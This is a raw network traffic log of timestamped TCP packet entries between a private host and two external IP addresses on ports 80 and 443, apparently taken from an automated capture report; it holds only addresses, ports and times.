                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.378940105 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.379023075 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.379062891 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.380187988 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.380359888 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.380388975 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.380403996 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.381337881 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.381412983 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.381465912 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.381505966 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.382456064 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.382587910 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.382651091 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.383750916 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.383867979 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.383913994 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.385127068 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.385256052 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.385302067 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.386048079 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.386154890 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.386181116 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.386226892 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.387228012 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.387269020 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.387337923 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.387379885 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.388417959 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.388627052 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.388673067 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.389700890 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.389744043 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.389875889 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.389921904 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.417280912 CET49799443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.417340994 CET44349799172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.417706013 CET44349799172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.418943882 CET49799443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.419087887 CET49799443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.419132948 CET44349799172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.520175934 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.520220041 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.520292997 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.520338058 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.520730019 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.520776987 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.520796061 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.520834923 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.521833897 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.521888018 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.521971941 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.522013903 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.523139954 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.523211002 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.523267031 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.523303032 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.524270058 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.524329901 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.524362087 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.524508953 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.525392056 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.525448084 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.525465965 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.525513887 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.526527882 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.526577950 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.526664019 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.526731968 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.527743101 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.527789116 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.527826071 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.527867079 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.528872967 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.529011965 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.529061079 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.530050039 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.530102015 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.530191898 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.530237913 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.531253099 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.531320095 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.531483889 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.531605959 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.532440901 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.532488108 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.532567978 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.532607079 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.533600092 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.533665895 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.533744097 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.533814907 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.534790039 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.534828901 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.534857035 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.534898043 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.535936117 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.535980940 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.536115885 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.536168098 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.537111044 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.537309885 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.537363052 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.538314104 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.538374901 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.538408995 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.538537025 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.539455891 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.539505005 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.539566994 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.539725065 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.540695906 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.540741920 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.540769100 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.540815115 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.541819096 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.541860104 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.541939974 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.541979074 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.543024063 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.543065071 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.543174028 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.543215036 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.544183969 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.544230938 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.544399023 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.544437885 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.545351982 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.545435905 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.545488119 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.545546055 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.546557903 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.546603918 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.546688080 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.546730042 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.547723055 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.547766924 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.547825098 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.547868013 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.548903942 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.548945904 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.549019098 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.549068928 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.550060034 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.550142050 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.550219059 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.550271988 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.551292896 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.551394939 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.551415920 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.551429987 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.552480936 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.552604914 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.552647114 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.553576946 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.553617954 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.553702116 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.553757906 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.554893970 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.554940939 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.555006027 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.555058002 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.556102037 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.556164026 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.556282043 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.556350946 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.557131052 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.557172060 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.557224035 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.557265043 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.558269978 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.558315992 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.558470011 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.558517933 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.559520006 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.559578896 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.559601068 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.559614897 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.560875893 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.560935020 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.560960054 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.560997963 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.561855078 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.561894894 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.561986923 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.562026978 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.563163042 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.563215017 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.563298941 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.563337088 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.564201117 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.564263105 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.564291954 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.564363003 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.565337896 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.565382957 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.565490961 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.565530062 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.566524029 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.566570997 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.566643000 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.566680908 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.567688942 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.567727089 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.567809105 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.567848921 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.568897963 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.568948984 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.569034100 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.569123030 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.570056915 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.570103884 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.570154905 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.570219994 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.571229935 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.571276903 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.571374893 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.572370052 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.572434902 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.572475910 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.572535038 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.572594881 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.573594093 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.573648930 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.573726892 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.573772907 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.574760914 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.574820995 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.575170040 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.575215101 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.575968981 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.576092958 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.576134920 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.577157021 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.577246904 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.577290058 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.578327894 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.578367949 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.578495026 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.578537941 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.579518080 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.579565048 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.579580069 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.579619884 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.580688000 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.580735922 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.580768108 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.580807924 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.582039118 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.582083941 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.712198019 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.712296009 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.712353945 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.712707996 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.712852955 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.712912083 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.713901043 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.713951111 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.714066029 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.714119911 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.715095043 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.715151072 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.715209961 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.715253115 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.716264963 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.716314077 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.716398954 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.717658043 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.717700005 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.717890024 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.717931032 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:34.718595028 CET804979731.41.244.11192.168.2.4
